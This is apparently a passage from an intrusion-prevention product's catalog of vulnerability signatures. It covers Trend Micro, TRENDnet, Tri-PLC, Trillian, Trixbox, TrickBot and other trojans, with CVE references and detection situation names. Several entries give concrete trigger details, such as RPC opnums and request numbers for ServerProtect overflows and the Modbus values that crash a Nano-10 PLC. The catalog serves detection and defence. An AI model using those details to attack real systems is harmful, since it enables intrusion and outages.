Trend-Micro-Safesync-For-Enterprise-Dead_Local_Device-Command-Injection

About this vulnerability: A vulnerability in Trend Micro SafeSync for Enterprise
Risk: Moderate
First detected in: sgpkg-ips-956-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Trend Micro SafeSync for Enterprise
Type: Input Validation
Description: Improper validation of requests causes a command injection vulnerability in Trend Micro SafeSync for Enterprise. A successful exploit allows an attacker to run arbitrary commands on the target system witohut authentication.
Situation: HTTP_CRL-Trend-Micro-Safesync-For-Enterprise-Dead_Local_Device-Command-Injection
Back to top

Trend-Micro-Safesync-For-Enterprise-Devicetool-Devid-Command-Injection

About this vulnerability: A vulnerability in Trend Micro SafeSync for Enterprise
Risk: Moderate
First detected in: sgpkg-ips-880-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Trend Micro SafeSync for Enterprise
Type: Input Validation
Description: Insufficient validation of request data causes a command injection vulnerability in Trend Micro SafeSync for Enterprise. A successful exploitation allows an attacker to run arbitrary commands as root.
Situation: HTTP_CRL-Trend-Micro-Safesync-For-Enterprise-Devicetool-Devid-Command-Injection
Back to top

Trend-Micro-Safesync-For-Enterprise-Devicetool.pm-Get_Device_Info-SQL-Injection

About this vulnerability: A vulnerability in Trend Micro SafeSync for Enterprise
Risk: Moderate
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Trend Micro SafeSync for Enterprise
Type: Input Validation
Description: Insufficient validation of HTTP requests causes an SQL injection vulnerability in Trend Micro SafeSync for Enterprise. A successful exploit can allow an attacker to execute code with the privileges of the server process.
Situation: HTTP_CRL-Trend-Micro-Safesync-For-Enterprise-Devicetool.pm-Get_Device_Info-SQL-Injection
Back to top

Trend-Micro-Safesync-For-Enterprise-Devicetool.pm-Get_nic_Device-SQL-Injection

About this vulnerability: A vulnerability in Trend Micro SafeSync for Enterprise
Risk: High
First detected in: sgpkg-ips-895-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Trend Micro SafeSync for Enterprise
Type: Input Validation
Description: There exists an SQL Injection vulnerability in Trend Micro's SafeSync's deviceTool.pm Perl module. A remote, authenticated, attacker can use this to execute arbitrary code on the affected system.
Situation: HTTP_CRL-Trend-Micro-Safesync-For-Enterprise-Devicetool.pm-Get_nic_Device-SQL-Injection
Back to top

Trend-Micro-Safesync-For-Enterprise-License-Command-Injection

About this vulnerability: A vulnerability in Trend Micro SafeSync for Enterprise
Risk: Moderate
First detected in: sgpkg-ips-938-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Trend Micro SafeSync for Enterprise
Type: Input Validation
Description: Improper validation of user-supplied data to the license end point of Trend Micro SafeSync for Enterprise causes a command injection vulnerability which can be exploited to gain root-level code execution access on the target system.
Situation: File-Text_Trend-Micro-Safesync-For-Enterprise-License-Command-Injection
Back to top

Trend-Micro-Safesync-For-Enterprise-Replace_Local_Disk-Command-Injection

About this vulnerability: A vulnerability in Trend Micro SafeSync for Enterprise
Risk: Moderate
First detected in: sgpkg-ips-949-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Trend Micro SafeSync for Enterprise
Type: Input Validation
Description: Improper validation of user-supplied data to the replace_local_disk() function of Trend Micro SafeSync for Enterprise causes a command injection vulnerability which can be exploited to gain root-level code execution access on the target system.
Situation: File-Text_Trend-Micro-Safesync-For-Enterprise-Replace_Local_Disk-Command-Injection
Back to top

Trend-Micro-Safesync-For-Enterprise-Restartservice-Command-Injection

About this vulnerability: A vulnerability in Trend Micro SafeSync for Enterprise
Risk: Moderate
First detected in: sgpkg-ips-864-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Trend Micro SafeSync for Enterprise
Type: Input Validation
Description: Insufficient validation of request data in Trend Micro's SafeSync for Enterprise causes a command injection vulnerability. A successful exploitation allows an attacker to run arbitrary code with root privileges.
Situation: HTTP_CRL-Trend-Micro-Safesync-For-Enterprise-Restartservice-Command-Injection
Back to top

Trend-Micro-Safesync-For-Enterprise-Rollback-Command-Injection

About this vulnerability: A vulnerability in Trend Micro SafeSync for Enterprise
Risk: Moderate
First detected in: sgpkg-ips-880-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Trend Micro SafeSync for Enterprise
Type: Input Validation
Description: Insufficient validation of request parameters in the rollback function of Trend Micro SafeSync for Enterprise causes a command injection vulnerability. A successful exploitation allows an attacker to run arbitrary code on the target system with root privileges.
Situation: HTTP_CRL-Trend-Micro-Safesync-For-Enterprise-Rollback-Command-Injection
Back to top

Trend-Micro-Safesync-For-Enterprise-Storage.pm-Device_Id-Role-Command-Injection

About this vulnerability: A vulnerability in Trend Micro SafeSync for Enterprise
Risk: Moderate
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Trend Micro SafeSync for Enterprise
Type: Input Validation
Description: Insufficient validation of client input causes a command injection vulnerability in Trend Micro SafeSync for Enterprise. A successful exploitation allows an attacker to run arbitrary commands on the target system.
Situation: HTTP_CRL-Trend-Micro-Safesync-For-Enterprise-Storage.pm-Device_Id-Role-Command-Injection
Back to top

Trend-Micro-Scanmail-File-Disclosure

About this vulnerability: File disclosure vulnerability in Trend Micro ScanMail for Domino
Risk: Low
First detected in: sgpkg-ips-15-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Trend Micro ScanMail
Type: Insecure Configuration
Description: Trend Micro ScanMail for Domino leaves certain files accessible through a Web browser. A remote attacker could use this vulnerability to obtain sensitive information and disable the anti-virus protection.
Situation: HTTP_CSU-Trend-Micro-Scanmail-File-Disclosure
References:
CVE-2004-1003
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1003
BID-11612
http://www.securityfocus.com/bid/11612
OSVDB-11510
http://www.osvdb.org/11510
Back to top

Trend-Micro-ServerProtect-CreateBinding-DCE-RPC-Stack-Overflow

About this vulnerability: Buffer overflow vulnerability in Trend Micro ServerProtect
Risk: High
First detected in: sgpkg-ips-108-2032
Last changed: sgpkg-ips-1734-5242
Platform: Windows
Software: Trend Micro ServerProtect
Type: Buffer Overflow
Description: There is a stack-based buffer overflow vulnerability in Trend Micro ServerProtect. A crafted RPC call with a malicious string allows arbitrary code execution with System level privileges.
Situation: MSRPC-TCP_CPS-Trend-Micro-ServerProtect-CreateBinding-DCE-RPC-Stack-Overflow
References:
CVE-2007-2508
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2508
BID-23868
http://www.securityfocus.com/bid/23868
OSVDB-35790
http://www.osvdb.org/35790
OSVDB-35789
http://www.osvdb.org/35789
Back to top

Trend-Micro-ServerProtect-EarthAgent-DCE-RPC-Stack-Overflow

About this vulnerability: Buffer overflow vulnerability in the EarthAgent component of Trend Micro ServerProtect
Risk: High
First detected in: sgpkg-ips-108-2032
Last changed: sgpkg-ips-1734-5242
Platform: Windows
Software: Trend Micro ServerProtect
Type: Buffer Overflow
Description: There is a stack-based buffer overflow vulnerability in the EarthAgent component of Trend Micro ServerProtect. A crafted RPC call with a malicious string allows arbitrary code execution with System level privileges.
Situation: MSRPC-TCP_CPS-Trend-Micro-ServerProtect-EarthAgent-DCE-RPC-Stack-Overflow
References:
CVE-2007-2508
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2508
BID-23866
http://www.securityfocus.com/bid/23866
OSVDB-35790
http://www.osvdb.org/35790
OSVDB-35789
http://www.osvdb.org/35789
Back to top

Trend-Micro-ServerProtect-EarthAgent-RPC-RPCFN-CopyAUSrc-BOF

About this vulnerability: Buffer overflow vulnerability in Trend Micro ServerProtect
Risk: High
First detected in: sgpkg-ips-119-2032
Last changed: sgpkg-ips-1734-5242
Platform: Windows
Software: Trend Micro ServerProtect
Type: Buffer Overflow
Description: There is a stack-based buffer overflow vulnerability in Trend Micro ServerProtect. A crafted RPC call with opnum 0, Trent_req_num 0x001F0042, and a malicious string parameter allows arbitrary code execution with the privileges of the affected service process, which is SYSTEM on Windows platforms.
Situation: MSRPC-TCP_CPS-Trend-Micro-ServerProtect-EarthAgent-RPC-RPCFN-CopyAUSrc-BOF
References:
CVE-2007-4218
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4218
BID-25395
http://www.securityfocus.com/bid/25395
Back to top

Trend-Micro-ServerProtect-EarthAgent-String-Buffer-Overflow

About this vulnerability: String handling buffer overflow vulnerability in Trend Micro ServerProtect
Risk: High
First detected in: sgpkg-ips-122-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Trend Micro ServerProtect
Type: Buffer Overflow
Description: Trend Micro ServerProtect suffers from a buffer overflow in string handling. A long string sent as a part of a certain command will cause a stack based buffer overflow. The vulnerability can be exploited by remote attackers to execute arbitrary code on a vulnerable host with System level privileges.
Situation: Generic_Trend-Micro-ServerProtect-EarthAgent-String-Buffer-Overflow
References:
CVE-2007-4731
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4731
OSVDB-45878
http://www.osvdb.org/45878
Back to top

Trend-Micro-ServerProtect-RPC-NTF-SetPagerNotifyConfig-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Trend Micro ServerProtect
Risk: High
First detected in: sgpkg-ips-118-2032
Last changed: sgpkg-ips-1734-5242
Platform: Windows
Software: Trend Micro ServerProtect
Type: Buffer Overflow
Description: There is a stack-based buffer overflow vulnerability in Trend Micro ServerProtect. A crafted RPC call with opnum 0, Trent_req_num 0x00030508 and a malicious payload allows arbitrary code execution with the privileges of the affected service process, which is SYSTEM on Windows platforms.
Situation: MSRPC-TCP_CPS-Trend-Micro-ServerProtect-RPC-NTF-SetPagerNotifyConfig-Buffer-Overflow
References:
CVE-2007-4218
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4218
BID-25395
http://www.securityfocus.com/bid/25395
Back to top

Trend-Micro-ServerProtect-RPC-RPCFN-CMON-SetSvcImpersonateUser-BOF

About this vulnerability: Stack-based buffer overflow vulnerability in Trend Micro ServerProtect
Risk: High
First detected in: sgpkg-ips-119-2032
Last changed: sgpkg-ips-1734-5242
Platform: Windows
Software: Trend Micro ServerProtect
Type: Buffer Overflow
Description: There is a stack-based buffer overflow vulnerability in Trend Micro ServerProtect. A crafted RPC call with opnum 0, Trent_req_num 0x000A0010, and a malicious string parameter allows arbitrary code execution with the privileges of the affected service process, which is SYSTEM on Windows platforms.
Situation: MSRPC-TCP_CPS-Trend-Micro-ServerProtect-RPC-RPCFN-CMON-SetSvcImpersonateUser-BOF
References:
CVE-2007-4218
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4218
BID-25395
http://www.securityfocus.com/bid/25395
Back to top

Trend-Micro-ServerProtect-RPCFN-Engine-RPC-Buffer-Overflows

About this vulnerability: Buffer overflow vulnerabilities in Trend Micro ServerProtect
Risk: High
First detected in: sgpkg-ips-119-2032
Last changed: sgpkg-ips-1734-5242
Platform: Windows
Software: Trend Micro ServerProtect
Type: Buffer Overflow
Description: There are stack-based buffer overflow vulnerabilities in Trend Micro ServerProtect. A crafted RPC call with opnum 0, Trent_req_num 0x000A0030, 0x00030010 or 0x0003000D, and a malicious string parameter allows arbitrary code execution with the privileges of the affected service process, which is SYSTEM on Windows platforms.
Situation: MSRPC-TCP_CPS-Trend-Micro-ServerProtect-RPCFN-Engine-RPC-Buffer-Overflows
References:
CVE-2007-4218
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4218
BID-25395
http://www.securityfocus.com/bid/25395
Back to top

Trend-Micro-ServerProtect-SPNT-Engine-RPC-Buffer-Overflows

About this vulnerability: Buffer overflow vulnerabilities in Trend Micro ServerProtect
Risk: High
First detected in: sgpkg-ips-119-2032
Last changed: sgpkg-ips-1734-5242
Platform: Windows
Software: Trend Micro ServerProtect
Type: Buffer Overflow
Description: There are stack-based buffer overflow vulnerabilities in Trend Micro ServerProtect. A crafted RPC call with opnum 0, Trent_req_num 0x0003010C or 0x00030044, and a malicious payload allows arbitrary code execution with the privileges of the affected service process, which is SYSTEM on Windows platforms.
Situation: MSRPC-TCP_CPS-Trend-Micro-ServerProtect-SPNT-Engine-RPC-Buffer-Overflows
References:
CVE-2007-4218
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4218
BID-25395
http://www.securityfocus.com/bid/25395
Back to top

Trend-Micro-Smart-Protection-Server-Admin_notification.php-Command-Injection

About this vulnerability: A vulnerability in Trend Micro Smart Protection Server
Risk: High
First detected in: sgpkg-ips-824-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Trend Micro Smart Protection Server
Type: Input Validation
Description: There exists a remote code execution vulnerability in Tren Micro Smart Protection Server. This can allow a remote, authenticated attacker to execute arbitrary code on the affected system.
Situation: HTTP_CRL-Trend-Micro-Smart-Protection-Server-Admin_notification.php-Command-Injection
References:
CVE-2016-6267
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6267
Back to top

Trend-Micro-Smart-Protection-Server-ccca_ajaxhandler.php-Remote-Code-Execution

About this vulnerability: A vulnerability in Trend Micro Smart Protection Server
Risk: High
First detected in: sgpkg-ips-809-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Trend Micro Smart Protection Server
Type: Input Validation
Description: There exists a remote code execution vulnerability in Trend Micro Smart Protection Server.
Situation: HTTP_CRL-Trend-Micro-Smart-Protection-Server-ccca_ajaxhandler.php-Remote-Code-Execution
References:
CVE-2016-6266
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6266
Back to top

Trend-Micro-Smart-Protection-Server-Wcs_Bwlists_Handler-Command-Injection

About this vulnerability: A vulnerability in Trend Micro Smart Protection Server
Risk: Moderate
First detected in: sgpkg-ips-880-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Trend Micro Smart Protection Server
Type: Input Validation
Description: Insufficient validation of request parameter causes a command injection vulnerability in Trend Micro Smart Protection Server. A successful exploitation allows an attacker to run arbitrary commands with the privileges of the server process.
Situation: HTTP_CRL-Trend-Micro-Smart-Protection-Server-Wcs_Bwlists_Handler-Command-Injection
Back to top

Trend-Micro-Threat-Discovery-Appliance-Remote-Command-Execution

About this vulnerability: A Trend Micro Threat Discovery Appliance Remote Command Execution vulnerability
Risk: High
First detected in: sgpkg-ips-1020-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Trend Micro Threat Discovery Appliance
Type: Input Validation
Description: A vulnerability in Trend Micro Threat Discovery Appliance, version 2.6.1062r1, which allows remote attackers to reset the admin password back to 'admin' and execute remote code on the target system.
Situation: HTTP_CSH-Trend-Micro-Threat-Discovery-Appliance-Remote-Command-Execution
References:
CVE-2016-7552
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7552
Back to top

Trend-Micro-Web-Security-Virtual-Appliance-RCE

About this vulnerability: An attempt to exploit a vulnerability in Trend Micro InterScan Web Security Virtual Appliance
Risk: High
First detected in: sgpkg-ips-1341-5242
Last changed: sgpkg-ips-1341-5242
Platform: Generic
Software: Trend Micro InterScan Web Security Virtual Appliance
Type: Input Validation
Description: There exists a vulberability in Trend Micro InterScan Web Security Virtual Appliance, versions before 6.5 SP2 Patch 4 (Build 1901), which allows remote attackers to gather sensative information via directory traversal due to the insufficient validation of user input to the file parameter.
Situation: HTTP_CS-Trend-Micro-Web-Security-Virtual-Appliance-RCE
References:
CVE-2020-8604
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8604
Back to top

Trendmicro-OfficeScanNT-Listener-Directory-Traversal

About this vulnerability: A Trendmicro OfficeScanNT Listener Directory Traversal vulnerability
Risk: Moderate
First detected in: sgpkg-ips-796-5211
Last changed: sgpkg-ips-1638-5242
Platform: Generic
Software: Trend Micro OfficeScan
Type: Directory Traversal
Description: A vulnerability in TrendMicro OfficeScanNT, multiple versions, which allows remote attackers to read arbitrary files via a directory traversal in an HTTP request.
References:
CVE-2008-2439
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2439
BID-31531
http://www.securityfocus.com/bid/31531
OSVDB-48730
http://www.osvdb.org/48730
Back to top

TRENDnet-SecurView-Buffer-Overflow

About this vulnerability: A TRENDnet SecurView Buffer Overflow vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-709-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: TRENDnet SecurView
Type: Buffer Overflow
Description: A buffer overflow vulnerability in TRENDnet SecurView Wireless Internet Camera, which allows remote attackers to execute arbitrary code via a long string to the OpenFileDlg method.
Situation: File-Text_TRENDnet-SecurView-Buffer-Overflow
References:
CVE-2012-4876
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4876
BID-52760
http://www.securityfocus.com/bid/52760
OSVDB-80661
http://www.osvdb.org/80661
Back to top

Tri-PLC-Crafted-Packet-Denial-Of-Service

About this vulnerability: A vulnerability in Tri-PLC Nano-10 r81 allowing denial of service.
Risk: High
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-1296-5242
Platform: Nano-10
Software: Nano-10 PLC
Type: Malfunction
Description: A vulnerability exists in Tri-PLC Nano-10 r81 allowing an attacker to cause a denial of service condition by sending a modbus protocol quantity of coils set to 0x0000.
Situation: Generic_CS-Tri-PLC-Crafted-Packet-Denial-Of-Service
Modbus_Read-Coils-Quantity-Of-Coils-Zero
References:
CVE-2013-2784
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2784
Back to top

Tri-PLC-Nano-10-r81-Denial-Of-Service

About this vulnerability: A vulnerability in Tri-PLC Nano-10 r81 allowing denial of service.
Risk: High
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-1296-5242
Platform: Nano-10
Software: Nano-10 PLC
Type: Malfunction
Description: A vulnerability exists in Tri-PLC Nano-10 r81 allowing an attacker to cause a denial of service condition by sending a modbus protocol data size bigger than 0x200, causing the device to go into interrupt state.
Situation: Generic_CS-Tri-PLC-Nano-10-r81-Denial-Of-Service
References:
CVE-2013-5741
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5741
OSVDB-97728
http://www.osvdb.org/97728
Back to top

TrickBot-C2-Traffic

About this vulnerability: Trickbot C2 traffic was detected
Risk: High
First detected in: sgpkg-ips-1202-5242
Last changed: sgpkg-ips-1296-5242
Platform: Linux; Windows
Software: <os>
Type: Backdoor
Description: Trickbot is a banking trojan capable to perform many different tasks such as stealing banking credentials in the infected systems. TLS decryption is required to match all Trickbot traffic successfully.
Situation: DNS-UDP_TrickBot-AnchorDNS-Client-Tunnel-Message
DNS-UDP_TrickBot-AnchorDNS-Server-Tunnel-Message
HTTP_CSU-TrickBot-C2-Traffic
ICMP_TrickBot-AnchorDNS-ICMP-Probe-Request
ICMP_TrickBot-AnchorDNS-ICMP-Probe-Response
Back to top

TrickBot-Trojan

About this vulnerability: TrickBot Trojan
Risk: High
First detected in: sgpkg-ips-930-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Javascript Injection
Description: TrickBot trojan spreads by malicious PDF attachments in email. The PDF contains a macro script which downloads and executes the TrickBot trojan.
Situation: File-PDF_Suspected-TrickBot-Trojan-PDF
Back to top

Trihedral-Vtscada-Wap-Directory-Traversal

About this vulnerability: A vulnerability in Trihedral VTScada
Risk: Moderate
First detected in: sgpkg-ips-784-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Trihedral VTScada
Type: Directory Traversal
Description: Insufficient validation of user-supplied paths in WAP requests results in a directory traversal vulnerability in Trihedral VTScada. A successful exploitation allows an attacker to gain access to arbitrary files on the target system.
Situation: HTTP_CSU-Trihedral-Vtscada-Wap-Directory-Traversal
References:
CVE-2016-4532
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4532
Back to top

Trihedral-Vtscada-Wap-Filter-Bypass

About this vulnerability: A vulnerability in Trihedral VTScada
Risk: Moderate
First detected in: sgpkg-ips-789-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Trihedral VTScada
Type: Input Validation
Description: Incorrect validation of a WAP request causes a vulnerability that allows arbitrary files to be read when exploited successfully.
Situation: HTTP_CSU-Trihedral-Vtscada-Wap-Filter-Bypass
References:
CVE-2016-4510
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4510
Back to top

Trihedral-Vtscada-Web-Interface-Integer-Overflow

About this vulnerability: A vulnerability in Trihedral VTS
Risk: Moderate
First detected in: sgpkg-ips-628-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Trihedral VTScada
Type: Integer Overflow
Description: An integer overflow vulnerability has been reported in Trihedral VTScada. The vulnerability is due to improper bounds checking while handling crafted requests to the HTTP server. By providing a crafted Content-Length header value, an attacker is able to terminate the HTTP server, creating a denial of service condition.
Situation: HTTP_CS-Trihedral-Vtscada-Web-Interface-Integer-Overflow
References:
CVE-2014-9192
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9192
OSVDB-115600
http://www.osvdb.org/115600
Back to top

Trillian-Aim:-URI-Handler-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Trillian
Risk: High
First detected in: sgpkg-ips-115-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Trillian
Type: Buffer Overflow
Description: Trillian has a buffer overflow vulnerability. A remote attacker can exploit this vulnerability by enticing a user to visit a crafted web site, to compromise the vulnerable system.
Situation: HTTP_Trillian-Aim:-URI-Handler-Buffer-Overflow
File-Text_Trillian-Aim:-URI-Handler-Buffer-Overflow
References:
CVE-2007-3832
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3832
BID-24927
http://www.securityfocus.com/bid/24927
Back to top

Trillian-Aim:-URI-Handler-Code-Injection

About this vulnerability: Code injection vulnerability in Trillian
Risk: High
First detected in: sgpkg-ips-114-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Trillian
Type: Input Validation
Description: There is a code injection vulnerability in Trillian. The vulnerability is a result of insufficient input validation while processing the ini parameter supplied via aim:// URIs . A remote attacker can exploit this vulnerability by enticing a user to visit a crafted web site, to create arbitrary files on the affected system.
Situation: HTTP_Trillian-Aim:-URI-Handler-Code-Injection
File-Text_Trillian-Aim:-URI-Handler-Code-Injection
References:
CVE-2007-3833
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3833
BID-24927
http://www.securityfocus.com/bid/24927
Back to top

Trimble-Navigation-SketchUp-BMP-File-Buffer-Overflow

About this vulnerability: Trimble Navigation SketchUp BMP File Buffer Overflow detected
Risk: Moderate
First detected in: sgpkg-ips-571-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: SketchUp
Type: Buffer Overflow
Description: A remote code execution vulnerability exists in Trimble Navigation's Sketchup. The vulnerability is due to a heap buffer overflow while processing BMP files which contain malicious RLE data. Remote unauthenticated attackers can exploit this vulnerability by enticing a target user to open a malicious BMP file. Successful exploitation could result in arbitrary code execution with the privileges of the logged in user. If exploitation is not successful, the application may terminate abnormally.
Situation: File-Binary_Trimble-Navigation-SketchUp-BMP-File-Buffer-Overflow
File-Binary_Trimble-Navigation-SketchUp-Pict-File-Buffer-Overflow-2
References:
CVE-2013-3663
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3663
BID-60248
http://www.securityfocus.com/bid/60248
Back to top

Tripwire-File-Name-Format-String

About this vulnerability: A vulnerability in Tripwire
Risk: High
First detected in: sgpkg-ips-419-4219
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: Tripwire; Open Source Tripwire
Type: Format String
Description: There is a format string vulnerability in Tripwire, a software tool that checks file system changes on a target system. Tripwire scans file systems for changes and can be configured to send an email report with the scan details (e.g., with the -M option). Upon encountering a file with a specially crafted name during such a scan, the format string vulnerability is triggered. It is possible for an attacker to run arbitrary code in the privilege of root, which is the default user account that runs Tripwire.
Situation: FTP_CS-Tripwire-File-Name-Format-String
Back to top

Trixbox-Directory-Traversal

About this vulnerability: A Trixbox Directory Traversal vulnerability.
Risk: High
First detected in: sgpkg-ips-726-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Trixbox
Type: Directory Traversal
Description: A vulnerability in Trixbox, versions CE 2.6.1 and before, which allows remote attackers to include and execute arbitrary file via a directory traversal.
Situation: HTTP_CRL-Trixbox-Directory-Traversal
References:
CVE-2008-6825
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6825
BID-30135
http://www.securityfocus.com/bid/30135
OSVDB-50421
http://www.osvdb.org/50421
Back to top

Trojan-Downloader-MSIL-OnyxDropper-A

About this vulnerability: Trojan Downloader MSIL OnyxDropper A
Risk: High
First detected in: sgpkg-ips-1355-5242
Last changed: sgpkg-ips-1355-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Trojan Downloader MSIL OnyxDropper A traffic.
Situation: HTTP_CRL-Trojan-Downloader-MSIL-OnyxDropper-A
Back to top

Trojan-MSIL-Fergstox-A

About this vulnerability: Trojan MSIL Fergstox A
Risk: High
First detected in: sgpkg-ips-1355-5242
Last changed: sgpkg-ips-1355-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Trojan MSIL Fergstox A traffic.
Situation: SMTP_CS-Trojan-MSIL-Fergstox-A
Back to top

Trojan-Shell-Retemuja-A

About this vulnerability: Trojan Shell Retemuja A
Risk: High
First detected in: sgpkg-ips-1355-5242
Last changed: sgpkg-ips-1355-5242
Platform: Linux
Software: <os>
Type: Code Injection
Description: Trojan Shell Retemuja A traffic.
Situation: HTTP_CRL-Trojan-Shell-Retemuja-A
Back to top

Trojan-Win32-FraudPack

About this vulnerability: Trojan.Win32.FraudPack
Risk: High
First detected in: sgpkg-ips-293-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Trojan.Win32.FraudPack is a rogue antispyware application that claims to detect malware, but is actually malware by itself.
Situation: HTTP_CS-Trojan.Win32.FraudPack-Checkin
Back to top

TrueOnline-Billion-5200W-T-Router-Command-Injection

About this vulnerability: A TrueOnline Billion 5200W-T Router Command Injection vulnerability
Risk: High
First detected in: sgpkg-ips-1028-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Billion 5200W-T
Type: Input Validation
Description: A vulnerability in the TrueOnline Billion 5200W-T routers, which allows remote attackers to execute arbitrary commands via the adv_remotelog.asp and tools_time.asp pages.
Situation: HTTP_CRL-TrueOnline-Billion-5200W-T-Router-Command-Injection
Back to top

TrueOnline-ZyXEL-P660HN-T-V1-Router-ViewLog.asp-Command-Injection

About this vulnerability: A TrueOnline ZyXEL P660HN-T V1 Router ViewLog.aspCommand Injection vulnerability
Risk: High
First detected in: sgpkg-ips-1028-5242
Last changed: sgpkg-ips-1622-5242
Platform: Generic
Software: ZyXEL P660HN
Type: Input Validation
Description: A vulnerability in the TrueOnline ZyXEL P660HN-T modems, version 1, which allows remote attackers to execute arbitrary commands via the ViewLog.asp page.
Situation: HTTP_CRL-TrueOnline-ZyXEL-P660HN-T-V1-Router-ViewLog.asp-Command-Injection
References:
CVE-2017-18368
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18368
Back to top

TrueOnline-ZyXEL-P660HN-T-V2-Router-logSet.asp-Command-Injection

About this vulnerability: A TrueOnline ZyXEL P660HN-T V2 Router logSet.asp Command Injection vulnerability
Risk: High
First detected in: sgpkg-ips-1028-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ZyXEL P660HN
Type: Input Validation
Description: A vulnerability in the TrueOnline ZyXEL P660HN-T routers, version 2, which allows remote attackers to execute arbitrary commands via the logSet.asp page.
Situation: HTTP_CRL-TrueOnline-ZyXEL-P660HN-T-V2-Router-logSet.asp-Command-Injection
Back to top

Trustwave-Holdings-Modsecurity-Chunked-Transfer-Encoding-Policy-Bypass

About this vulnerability: A vulnerability in Trustwave: SpiderLabs ModSecurity
Risk: Moderate
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ModSecurity
Type: Input Validation
Description: There exists a policy bypass vulnerability in ModSecurity.
Situation: File-Text_Trustwave-Holdings-Modsecurity-Chunked-Transfer-Encoding-Policy-Bypass
References:
CVE-2013-5705
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5705
BID-66552
http://www.securityfocus.com/bid/66552
OSVDB-105191
http://www.osvdb.org/105191
Back to top

Tstisapi-DLL-BOF

About this vulnerability: Buffer overflow in tstisapi.dll on Pi3Web 1.0.1 Web server
Risk: Moderate
First detected in: sgpkg-ips-2-1102
Last changed: sgpkg-ips-1637-5242
Platform: Windows
Software: John Roy Pi3Web
Type: Buffer Overflow
Description: The tstisapi.dll on Pi3Web 1.0.1 Web server has a buffer overflow vulnerability. This allows remote attackers to cause a denial of service, and possibly execute arbitrary commands by using a long URL.
Situation: HTTP_CSU-Tstisapi-DLL-BOF
References:
CVE-2001-0302
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0302
BID-2381
http://www.securityfocus.com/bid/2381
Back to top

Tsunami-Linux-Trojan-Infection-Traffic

About this vulnerability: Tsunami Linux trojan infection traffic was detected
Risk: High
First detected in: sgpkg-ips-1355-5242
Last changed: sgpkg-ips-1355-5242
Platform: Linux
Software: <os>
Type: Backdoor
Description: Tsunami Linux trojan infection traffic was detected.
Situation: Generic_CS-Tsunami-Linux-Trojan-Infection-Traffic
Back to top

Ttawebtop-Cgi-File-Disclosure

About this vulnerability: ttawebtop.cgi arbitrary file disclosure
Risk: Moderate
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1637-5242
Platform: HP-UX; AIX; Linux; SCO; Solaris
Software: Tarantella Enterprise
Type: Directory Traversal
